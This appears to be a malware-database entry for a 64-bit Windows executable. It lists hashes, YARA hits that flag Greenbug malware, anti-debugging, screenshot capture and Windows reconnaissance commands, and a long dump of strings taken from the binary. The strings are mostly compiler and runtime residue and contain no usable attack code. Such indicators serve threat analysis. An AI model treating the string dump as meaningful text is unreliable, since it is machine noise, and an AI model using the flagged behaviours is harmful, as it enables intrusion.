Sample details: e0175eecf8d31a6f32da076d22ecbdff --

Hashes
MD5: e0175eecf8d31a6f32da076d22ecbdff
SHA1: af85a187ad3fbbe985f77f0a4b492cd78c041d17
SHA256: cacc32ab0a1880afd74a040e8211662789cb70b252c25cb2d5971b707455ff5d
SSDEEP: 12288:XBJmM8sxaM2add/OP94zHA4ahi4Vr5P4XwJ8+q+qk+wFc65sYo/PkM+5rQRCLjj8:XBJmM8X8iqwD5kmrwCXMOT4dS99
Details
File Type: PE32+
Added: 2019-05-24 22:46:24
Yara Hits
YRP/Microsoft_Visual_Cpp_80_DLL | YRP/IsPE64 | YRP/IsWindowsGUI | YRP/HasDebugData | YRP/HasRichSignature | YRP/domain | YRP/IP | YRP/contentis_base64 | YRP/WMI_strings | YRP/Misc_Suspicious_Strings | YRP/DebuggerException__SetConsoleCtrl | YRP/anti_dbg | YRP/network_tcp_socket | YRP/screenshot | YRP/win_files_operation | YRP/Big_Numbers0 | YRP/Big_Numbers1 | YRP/CRC32_poly_Constant | YRP/CRC32_table | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Greenbug_Malware_4 | YRP/Greenbug_Malware_5 | FlorianRoth/Recon_Commands_Windows_Gen1 | FlorianRoth/Greenbug_Malware_4 | FlorianRoth/Greenbug_Malware_5 |
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
@SUVATAWH
 A_A\^][
l$ I9h
SVWAVH
8A^_^[
t$ AVH
UVWATAUAVAWH
t7@80t
t7@80t
PA_A^A]A\_^]
@UAVAWH
 A_A^]
 A_A^]
UVWATAUAVAWH
L$ L;a
pA_A^A]A\_^]
@UVWAVAWH
A_A^_^]
WAVAWH
UWATAVAWH
A_A^A\_]
WATAUAVAWH
A_A^A]A\_
@UVWAVAWH
A_A^_^]
WAVAWH
WATAUAVAWH
A_A^A]A\_
t$@f9u
fB94@u
@UVWATAUAVAWH
A_A^A]A\_^]
@UVWATAUAVAWH
A_A^A]A\_^]
@UVWAVAWH
A_A^_^]
@USVWAVH
A^_^[]
SVWATAUAVAWH
A_A^A]A\_^[
SUVWATAVAWH
pA_A^A\_^][
@USVWATAUAVAWH
A_A^A]A\_^[]
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
<;Ch} 
UAVAWH
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UWATAVAWH
A_A^A\_]
UAVAWH
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWAVH
PA^_^][
@SUVWATAVAWH
PA_A^A\_^][
@UVWAVAWH
A_A^_^]
WAVAWH
@UVWAVAWH
A_A^_^]
C@H+C8H
t Hc@D
VWATAVAWH
@A_A^A\_^
@WAVAWH
@A_A^_
@WAVAWH
A@H+A8H
M@H+M8H
@A_A^_
WAVAWH
F@H+F8H
@UVWATAUAVAWH
A_A^A]A\_^]
f9l$Pu
fB9,@u
WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
u#D9C\u
@USVWATAVAWH
CT$ H;
A_A^A\_^[]
SUVWAVH
A^_^][
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
@UVWAVAWH
A_A^_^]
@UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
UAVAWH
UAVAWH
E`H+EXH
E`H+EXH
@VWATAVAWH
2333333
A_A^A\_^
@UVWAVAWH
A_A^_^]
@SUVWAVH
0A^_^][
\$ VWAVH
fA9	u.I
@WAVAWH
UUUUUUU
@A_A^_
UUUUUUU
@WAVAWH
UUUUUUU
@A_A^_
UUUUUUU
WATAUAVAWH
UUUUUUU
UUUUUUU
A_A^A]A\_
@SUVATAUAVAWH
@A_A^A]A\^][
L9L$(L
t$ AVH
WATAUAVAWH
A_A^A]A\_
@VWAVH
WATAUAVAWH
A_A^A]A\_
UUUUUUU
@VWAVH
H;9t`f
SVWATAUAVAWH
`A_A^A]A\_^[
|$ fA98u
fB9<@u
t$ AVH
\$ VATAWH
0A_A\^
0A_A\^
D$XH;D$`t D
L$ SVWATAUAVAWH
I9t$0w
pA_A^A]A\_^[
@VWAVH
^0H9?t(H
|$ AVH
|$ AVH
f9\$@t
f9\$@t
@SUVAVH
(A^^][
H;\$ tB
SVWAVAWH
0A_A^_^[
|$ ATAVAWH
~@H9FXu
 A_A^A\
VWATAUAWH
L;KHu$H
L;KHu$H
0A_A]A\_^
KXL9KPt
@SUWATAUAVAWH
L$PL;IPs
M;L$Hu:I
M;L$Hu9I
A_A^A]A\_][
L$PM;L$Ps
L$XM9L$Pt)E
@USAWH
WAVAWH
L$ VWATAUAVAWH
l$HA_A^A]A\_^
y H9y0u
A0H9y8u
t$ AVH
@UVWAUAWH
pA_A]_^]
pA_A]_^]
UVWAVH
1D81t+D8q
HA^_^]
G@9E(t
GD9E(t
GH9E(t
HA^_^]
ATAVAWH
0A_A^A\
0A_A^A\
0A_A^A\
0A_A^A\
0A_A^A\
+9kdt	H
@USATAVH
@81t)@8q
A^A\[]
@UWAVH
@8t$Pu
|$ AVH
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@UVWAVAWH
A_A^_^]
@8,8t H
D$@HcH
D$@HcH
D$@HcH
D$@HcH
D$`HcH
D$`HcH
D$`HcH
D$`HcH
@UWAVH
L9t$xt
D$pHcH
D$pHcH
D$pHcH
D$`HcH
D$`HcH
D$`HcH
D$`HcH
f9\$Pt
UWATAVAWH
A_A^A\_]
@UVWAVAWH
A_A^_^]
@UVWATAUAVAWH
A_A^A]A\_^]
D$PHcH
@UVWATAUAVAWH
A_A^A]A\_^]
fF94@u
\$Pf9]
UAVAWH
fF9<@u
WAVAWH
UVWATAUAVAWH
PA_A^A]A\_^]
UATAUAVAWH
A_A^A]A\]
UWATAVAWH
A_A^A\_]
@SUVWAVH
0A^_^][
\$ VWAVH
|$ AVL
l$@H9+
|$ AVAWH
l$HI9+
|$0A_A^
@SUVWAVH
D$RH9D$@u
`A^_^][
|$ ATAUAVAWL
|$@A_A^A]A\
WATAUAVAWL
t$HA_A^A]A\_
@SUAVH
@VWAVH
H;9tBf
t$ WAVAWH
0A_A^_
t$ WAVAWH
0A_A^_
@VWATAVAWH
`A_A^A\_^
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
PA_A^A\_^
SVWATAUAVAWH
PA_A^A]A\_^[
L$ SVWH
L$ SVWH
^0H9?t(H
^0H9?t(H
@VWAVH
t$ AVH
@SUVWATH
`A\_^][
\$ UVWATAWH
@A_A\_^]
l$ VWAVH
@SUVWAVAWH
fD9|$0u
HA_A^_^][
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
@A_A^A]A\_^]
@UVWATAVH
j$LcJ L
Hct$hff
0A^A\_^]
|$ ATAVAWH
 A_A^A\
@SWAWH
|$ AVH
VATAUAVAWH
 A_A^A]A\^
|$ ATAUAVAWD
\$(A_A^A]A\
t$ WATAWH
 A_A\_
*H9{ t"D
uVH9{(t$D
H;C(u,H9{0t"D
\$ UVWAVAWH
0A_A^_^]
@UWATAUAVAWH
A_A^A]A\_]
9;C<r	
H9yhu0
L9#t	D
K(D9c$t
T$T9L$P
D8c,teL9#u`
D$|+S 
f9t$Fu	
|$ ATAVAWH
@A_A^A\
l$ VWAVH
9D$(}d
9A@t<H
UVWAVAWH
D8:u2H
A_A^_^]
D9>tXA
UVWATAUAVAWH
`A_A^A]A\_^]
@VWAVH
@VWAVH
@VWAVH
UVWATAUAVAWH
A_A^A]A\_^]
toH91uj
toH91uj
UVWATAUAVAWH
G	:E	u
:O	t	H
@8w	u7E3
:O	t	H
:O	t	H
G	:E	u
:O	t	H
A_A^A]A\_^]
UVWATAUAVAWH
:O	t	H
@8w	u8E3
:O	t	H
:O	t	H
:O	t	H
l$$D8d$!u
A_A^A]A\_^]
UVWATAUAVAWH
:K	t	H
D8K	u7E3
A_A^A]A\_^]
WAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
PA_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
@SUVWAVAWH
D$PH9D$8t
A_A^_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@USVWATAUAVAWH
H9D$@t
A_A^A]A\_^[]
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@USVWATAVAWH
A_A^A\_^[]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWAWH
0A__^[]
@USVWAWH
@A__^[]
x ATAVAWH
 A_A^A\
x ATAVAWH
A_A^A\
VWATAVAWH
A_A^A\_^
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
f9/t	H
SVWAVAWH
0A_A^_^[
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
UVWATAUAVAWH
l$4D8d$1u
A_A^A]A\_^]
UVWATAUAVAWH
l$4D8d$1u
A_A^A]A\_^]
UVWATAUAVAWH
l$$D8d$!u
A_A^A]A\_^]
UVWATAUAVAWH
l$$D8d$!u
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
f;E	tYD8K
A_A^A]A\_^]
UVWATAUAVAWH
f;E	tYD8K
A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
|<@ u&@
A_A^A]A\_^]
UVWATAUAVAWH
|<@ u&@
A_A^A]A\_^]
WATAUAVAWH
VUD8oDu!
A_A^A]A\_
WATAUAVAWH
VUD8oDu!
A_A^A]A\_
ATAVAWH
D$0.fD
D$0,fD
A_A^A\
ATAVAWH
D$0.fD
D$0,fD
A_A^A\
UVWATAUAVAWH
<xt!E3
A_A^A]A\_^]
UVWATAUAVAWH
<xt!E3
A_A^A]A\_^]
UATAUAVAWH
A_A^A]A\]
UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
)D$pH+_
A_A^A]A\_^]
UVWATAUAVAWH
)D$pH+_
A_A^A]A\_^]
WAVAWH
 A_A^_
WAVAWH
 A_A^_
L;L$(t
L;L$(A
UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
@SUVWAVAWH
D$PH9D$8t
A_A^_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@USVWATAUAVAWH
H9D$@t
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
@SUVWAVAWH
D$PH9D$8t
A_A^_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@USVWATAUAVAWH
H9D$@t
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAWH
Pp<:u3H
Pp<:u/H
A_A^A\_^
VWATAVAWH
Pp<:u3H
Pp<:u/H
A_A^A\_^
WATAUAVAWH
L96tfH
0A_A^A]A\_
t$ WAVAWH
L9|$pv^H;
fD9|$Xu
H;D$pr
0A_A^_
l$ VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
@A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@USVWATAUAVAWH
A_A^A]A\_^[]
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
UVWAVAWH
0A_A^_^]
UVWAVAWH
@A_A^_^]
WAVAWH
 A_A^_
WAVAWH
 A_A^_
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
toH91uj
toH91uj
toH91uj
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
:O	t	I
@8w	u7E3
:O	t	H
:O	t	I
|<8 u!@
A_A^A]A\_^]
WATAUAVAWH
VUD8oDu!
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
l$(L9k
D9T$0u3H
A_A^A]A\_^]
UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
PP<:woH
PP<:woH
A_A^A]A\_^]
VWATAVAWH
PP<:u3H
PP<:u/H
A_A^A\_^
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWAVAWH
A_A^_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
p WAVAWH
 A_A^_
SUVWATAUAVAWH
H+L$ x<H
8A_A^A]A\_^][
p WAVAWH
 A_A^_
UVWATAUAVAWH
l$pH9\$ u
H+L$(xBH
0A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
x ATAVAWH
A_A^A\
UVWATAUAVAWH
pA_A^A]A\_^]
UVWATAUAVAWH
pA_A^A]A\_^]
USVWATAUAVAWH
)t$0Hc
HA_A^A]A\_^[]
UVWATAUAVAWH
`A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
WAVAWH
 A_A^_
USVWATAUAVAWH
)t$0Hc
HA_A^A]A\_^[]
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
USVWATAUAVAWH
)t$0Hc
HA_A^A]A\_^[]
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
uNfE9P
ATAVAWH
 A_A^A\
WATAUAVAWH
 A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
@A_A^A]A\_
x ATAVAWH
0A_A^A\
WAVAWH
 A_A^_
AUAVAWH
0A_A^A]
fA;8utI
fA;0t)fA98t
SVWAVH
8A^_^[
D8t$8t
UVWATAUAVAWH
 A_A^A]A\_^]
@8l$8t
UAVAWH
WAVAWH
fD9>u"
0A_A^_
l$ VWAVH
9\$ ~>L
s WATAUAVAWH
9t$P~.8\$vt(H
9t$P~98\$vt3H
A_A^A]A\_
l$ VWAUAVAWH
L$(fA;
u$HcG$H;
t5f9(t
A_A^A]_^
VWATAVAWH
 A_A^A\_^
x ATAVAWH
 A_A^A\
x ATAUAWH
@A_A]A\
@UATAUAVAWH
!t$(H!t$ I
A_A^A]A\]
WAVAWH
 A_A^_
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
G0Hc	H
A_A^A]A\_^]
D8eoupH
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
AUAVAWH
0A_A^A]
@SVWATAUAVAWH
L!|$@L!
D$HHcH
A_A^A]A\_^[
SVWATAUAVAWH
0A_A^A]A\_^[
WATAVH
@A^A\_
AUAVAWH
@A_A^A]
{ ATAVAWH
A_A^A\
C0H9C(r
@UAVAWH
UVWATAUAVAWH
H+D$`H+D$H3
A_A^A]A\_^]
|$ AVH
fffffff
WATAUAVAWH
D$@!\$(H!\$ 
A_A^A]A\_
x ATAVAWH
@A_A^A\
9\$(tlM
@UVWATAUAVAWH
e0A_A^A]A\_^]
x ATAVAWH
;D8|$Ht
A_A^A\
x ATAVAWH
;D8|$Ht
A_A^A\
p WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
@USVWATAUAVAWH
eHA_A^A]A\_^[]
HcD$hH
@SUVWATAVAWH
zu|D!t$ E3
A_A^A\_^][
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
 A_A^A\_^
\$ UVWATAUAVAWH
D9l$dtXH
HcD$PH;
HcD$PH;
A_A^A]A\_^]
l$ VWATAVAWH
T$&@8t$&t9@8r
A81t@@8r
A_A^A\_^
WAVAWH
fE98t'
0A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
;Cu1f9K
f93t$M;
L$ SUVWH
|$ ATAVAWH
0A_A^A\
WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
^fD9+t
A_A^A]A\_^]
\$ UVWATAUAVAWH
A_A^A]A\_^]
fD9|$bu
H9L$Ht8H
UAVAWH
t$ WAVAWH
LcA<E3
t$ WATAUAVAWH
D!l$h3
0A_A^A]A\_
` AUAVAWH
t$8Hc0I
\$0D9=r
A_A^A]
t$ WATAUAVAW
A_A^A]A\_
VWATAVAWH
 A_A^A\_^
USVWAVH
A^_^[]
UVWATAUAVAWH
9D$XumE
A_A^A]A\_^]
WAVAWH
 A_A^_
t$ WATAUAVAWH
0A_A^A]A\_
@UATAUAVAWH
A_A^A]A\]
D82u&H
D8t$Ht
Hct$@H
sYHcL$HH
x ATAVAWH
< tD<	t@
 A_A^A\
H3E H3E
WATAUAVAWH
gfffffffH
D8L$Ht
A_A^A]A\_
x AUAVAWH
A_A^A]
@SUVWH
@SUVWH
@SUVWAVH
A^_^][
x ATAVAWH
D8&t4H
D8d$Ht
A_A^A\
ATAVAWH
D8d$8t
@A_A^A\
\$ UVWATAUAVAWH
fD9 t	H
A_A^A]A\_^]
D$DH3\$@H
UVWATAUAVAWH
 A_A^A]A\_^]
WAVAWH
 A_A^_
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
L$`tcA
 A_A^A]A\_^]
UVWATAUAVAWH
A,A9A(v&L
0A_A^A]A\_^]
WATAUAVAWH
O,D9O(vcH
0A_A^A]A\_
WATAUAVAWH
A;H$v}H
0A_A^A]A\_
SUVWATAUAVAWH
HA_A^A]A\_^][
@VWAVH
SUVWATAUAVAWH
\$4E;M
;B$vuI
D$0taA
D$0C+D0(
@09D$0
D$PE;M
H$E+H,toA
@(A9P4A
BP4A+@4;
s	A9;A
xA_A^A]A\_^][
WATAUAVAWH
C9|)$u>C
0A_A^A]A\_
VWAUAVAWH
A`D9L8
;B$vUH
,t0D9J0v*L
0A_A^A]_^
t$ WATAUAVAWH
D8M@t^
+J$D8M@
0A_A^A]A\_
UVWATAUAVAWH
0A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
UVWATAUAVAWH
 A_A^A]A\_^]
L$ UVWATAUAVAWH
0A_A^A]A\_^]
x ATAVAWH
0A_A^A\
@SUVWAVH
0A^_^][
9G$vAD
D9G$s5
l$ VWATAUAVAWE3
D9x(uiH
A(9B(D
X(D9y(
t'B;| 
l$PA_A^A]A\_^
WATAUAVAWH
A_A^A]A\_
H9_ht/H
WATAUAVAWH
 A_A^A]A\_
x ATAVA
A$+A,t[3
|$0A^A\
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
l$`C9,
 A_A^A]A\_^]
x AVE3
UVWATAUAVAWH
D;z,v(A
&D;j0u
 A_A^A]A\_^]
E8X@t8A
R0E8XAt
B0E8XAt
WAVAWH
9_P~%E3
VWAUAVAWH
9WP~FM
ukHcOP
HcGl;Gh}
A_A^A]_^
t H9X8tV
9YD~*3
9_D~*3
t*H9X8u$@8
E;Bl}EI
B`E;Bh|
E+BhIcJhL
UATAUAVAWH
q(9YD~tE3
9_D~E3
A_A^A]A\]
x ATAVAWH
 A_A^A\
\$Pu&H
USVWATAUAVAWH
_(HcODI
G8HcODI
G0LcGDI
D9g@~2Ic
A_A^A]A\_^[]
UVWATAUAVAWH
0A_A^A]A\_^]
C`D;Sh|
D+ShHcKhL
C`D;Sh|
D+ShHcKhL
;Ct~|H
;Ct~gH
x ATAVAWH
F`;Vh|
+VhHcNhL
C(9C u!
C,9C$u
 A_A^A\
H!\$(H!\$0
VWAUAVAWH
0A_A^A]_^
t$ WATAUAVAW
A_A^A]A\_
VWATAVAWH
 A_A^A\_^
UVWATAUAVAWH
0A_A^A]A\_^]
SVWATAUAVAWH
PA_A^A]A\_^[
@UATAUAVAWH
A_A^A]A\]
` AUAVAWH
0A_A^A]
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
f9.uVH
f9.u"H
tVf91tQH
x ATAVAWH
 A_A^A\
@SUVWATAVAWH
3fD9 t
A_A^A\_^][
|$ AVH
tSf91tNH
D;|$0t9
@USVWATAVAWH
tyfD9 tsH
tHfD9 tB
@A_A^A\_^[]
UVWATAUAVAWH
D$DD9T$X
|$h+t$D+
A_A^A]A\_^]
WAVAWH
 A_A^_
@SUVWATAVAWH
tcH95Q
PA_A^A\_^][
WATAUAVAWH
 A_A^A]A\_
USVWATAUAVAWH
8UXt$@
XA_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@USVWH
VWAUAVAWH
9WP~IM
ukHcOP
HcGl;Gh}
A_A^A]_^
H99u{H
WATAUAVAWH
A_A^A]A\_
H;YXt 
twH;^XtH3
t$H;^Xt
tGH;~XtA
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
91~*E3
WAVAWH
 A_A^_
@UAVAWH
ePA_A^]
u59_ @
WATAUAVAWH
A_A^A]A\_
x ATAVAWH
0A_A^A\
VWATAVAWH
0A_A^A\_^
x ATAVAWH
 A_A^A\
L9w t?H
WAVAWH
 A_A^_
H9J t1
UVWATAUAVAWH
w 9^ w	9^$
8\$!t)A
tW8\$!u;8\$"t5D
PA_A^A]A\_^]
@VWAVH
UVWAVAWH
A_A^_^]
WAVAWH
 A_A^_
WAVAWH
0A_A^_
l$ VWAVH
u)!t$(H
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
WAVAWH
 A_A^_
F(LcF I
9_P~$E3
VWAUAVAWH
9WP~IM
ukHcOP
HcGl;Gh}
A_A^A]_^
WAVAWH
 A_A^_
Hc;HcK
h UAVAWH
UVWATAVH
@A^A\_^]
UAVAWH
UVWATAUAVAWH
 A_A^A]A\_^]
l$ VWATAVAWH
 A_A^A\_^
u!!D$(H
|$ AVH
t$ WATAUAVAWH
A_A^A]A\_
9_P~$E3
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
9_P~LE3
K4A+H 
VWAUAVAWH
9WP~EM
ukHcOP
HcGl;Gh}
A_A^A]_^
VWAUAVAWH
9WP~IM
ukHcOP
HcGl;Gh}
A_A^A]_^
UAVAWH
u%!D$@H
WAVAWH
K 9N vEH
0A_A^_
t$ WAVAWH
;Vl}[H
F`;Vh|
+VhHcNhL
 A_A^_
l$ VWAVH
UAVAWH
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
UVWATAUAVAWH
8D$ u+I
A_A^A]A\_^]
C4D+@ H
D$(A9h
@8l$8t
r"fD;A
@8l$8t
|$ UATAUAVAWH
A_A^A]A\]
|$ UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
 A_A^A]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
0A_A^A]A\_^]
WAVAWH
 A_A^_
SVWAVH
D$`csm
H9BhuTH
~`8A!t
SVWAVAWH
PA_A^_^[
^ffffff
fffffff
ffffff
D$0f;VPu
UVWATAUAVAWH
D$`HcK
H;D$xu
 A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
SUVWATAUAVAWH
H9D$(u^L
L$0D;t$ s
HA_A^A]A\_^][
WATAUAVAWH
A_A^A]A\_
u!!D$(H
ATAVAWH
0A_A^A\
WAVAWH
0A_A^_
ATAVAWH
0A_A^A\
H#t$0tB
@USVWATAUAVAWH
H+G H=
A_A^A]A\_^[]
@SUVWATAUAVAWH
H+C H=
A_A^A]A\_^][
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
@A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
x ATAVAWH
 A_A^A\
x ATAVAWH
 A_A^A\
UAVAWH
@A_A^]
UAVAWH
@A_A^]
t.8\$P
WATAVH
WATAUAVAWH
t=L95]4
0A_A^A]A\_
D9t$htrH
@8t$8t
H(H9J(u
bad allocation
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789ABCDEFabcdef-+Xx
0123456789-+Ee
0123456789ABCDEFabcdef-+XxPp
:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
:AM:am:PM:pm
%I : %M : %S %p
%H : %M
%H : %M : S
%d / %m / %y
0123456789-
0123456789ABCDEFabcdef-+Xx
0123456789-+Ee
0123456789-
0123456789ABCDEFabcdef-+Xx
0123456789-+Ee
0123456789-
0123456789ABCDEFabcdef-+XxPp
0123456789ABCDEFabcdef-+XxPp
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
0123456789-
0123456789-
A0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefABCDEF
Unknown exception
CorExitProcess
_hypot
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
bad exception
Lock already taken
pEvents
SetThreadGroupAffinity
GetThreadGroupAffinity
GetCurrentProcessorNumberEx
GetLogicalProcessorInformationEx
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CreateEventExW
CreateSemaphoreExW
SetThreadStackGuarantee
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
GetLogicalProcessorInformation
CreateSymbolicLinkW
SetDefaultDllDirectories
EnumSystemLocalesEx
CompareStringEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleExW
SetFileInformationByHandleW
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
